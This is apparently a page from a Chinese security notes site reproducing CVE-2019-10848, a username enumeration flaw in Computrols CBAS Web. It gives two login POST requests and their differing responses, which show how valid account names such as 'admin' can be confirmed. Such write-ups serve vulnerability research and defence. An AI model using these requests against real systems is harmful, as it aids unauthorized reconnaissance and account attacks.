menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-10848)Computrols CBAS Web 用户名枚举 chevron_right (CVE-2019-10848)Computrols CBAS Web 用户名枚举.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-10848)Computrols CBAS Web 用户名枚举.md
    858 B / 2021-07-15 19:49:46
        (CVE-2019-10848)Computrols CBAS Web 用户名枚举
    ================================================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    19.0.0及以下
    
    三、复现过程
    ------------
    
    ### 测试无效用户:
    
        POST /cbas/index.php?m=auth&a=login HTTP/1.1
    
        username=randomuser&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62
    
    Response
    
        <!-- Failed login comments appear here -->
        <p class="alert-error">randomuser</p>
    
    ### 测试有效用户:
    
        POST /cbas/index.php?m=auth&a=login HTTP/1.1
    
        username=admin&password=&challenge=6e4344e7ac62520dba82d7f20ccbd422&response=e09aab669572a8e4576206d5c14befc5s
    
    Response
    
        <!-- Failed login comments appear here -->
        <p class="alert-error">Invalid username/password combination.  Please try again!</p>
    
    
    links
    file_download